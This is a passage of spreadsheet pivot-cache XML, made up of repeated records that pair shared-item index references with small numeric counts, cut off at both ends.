    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="76"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="77"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="77"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="77"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="77"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="77"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="78"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="78"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="78"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="78"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="78"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="79"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="79"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="79"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="79"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="79"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="79"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="80"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="80"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="80"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="105"/>
    <x v="80"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="80"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="80"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="80"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="81"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="81"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="81"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="81"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="36"/>
    <x v="81"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="23"/>
    <x v="81"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="32"/>
    <x v="81"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="247"/>
    <x v="81"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="79"/>
    <x v="81"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="39"/>
    <x v="81"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="28"/>
    <x v="81"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="202"/>
    <x v="81"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="81"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="81"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="56"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="56"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="59"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="59"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="82"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="82"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="82"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="82"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="82"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="82"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="82"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="82"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="82"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="82"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="82"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="13"/>
    <x v="82"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="82"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="82"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="76"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="76"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="83"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="83"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="90"/>
    <x v="83"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="83"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="84"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="84"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="84"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="84"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="6"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="14"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="85"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="85"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="85"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="34"/>
    <x v="85"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="74"/>
    <x v="85"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="86"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="86"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="86"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="86"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="86"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="86"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="86"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="87"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="87"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="87"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="87"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="88"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="88"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="88"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="88"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="88"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="88"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="88"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="88"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="88"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="88"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="28"/>
    <x v="88"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="35"/>
    <x v="88"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="88"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="88"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="89"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="89"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="89"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="89"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="20"/>
    <x v="89"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="30"/>
    <x v="89"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="89"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="89"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="89"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="89"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="86"/>
    <x v="89"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="285"/>
    <x v="89"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="89"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="89"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="90"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="90"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="90"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="90"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="90"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="90"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="90"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="90"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="90"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="90"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="90"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="90"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="90"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="90"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="91"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="91"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="91"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="91"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="91"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="91"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="91"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="91"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="91"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="91"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="91"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="91"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="91"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="91"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="92"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="92"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="92"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="15"/>
    <x v="92"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="92"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="85"/>
    <x v="92"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="92"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="93"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="93"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="93"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="93"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="93"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="94"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="94"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="94"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="94"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="94"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="95"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="95"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="95"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="95"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="95"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="95"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="16"/>
    <x v="95"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="95"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="95"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="95"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="95"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="95"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="95"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="95"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="96"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="96"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="96"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="130"/>
    <x v="96"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="96"/>
  </r>
  <r>
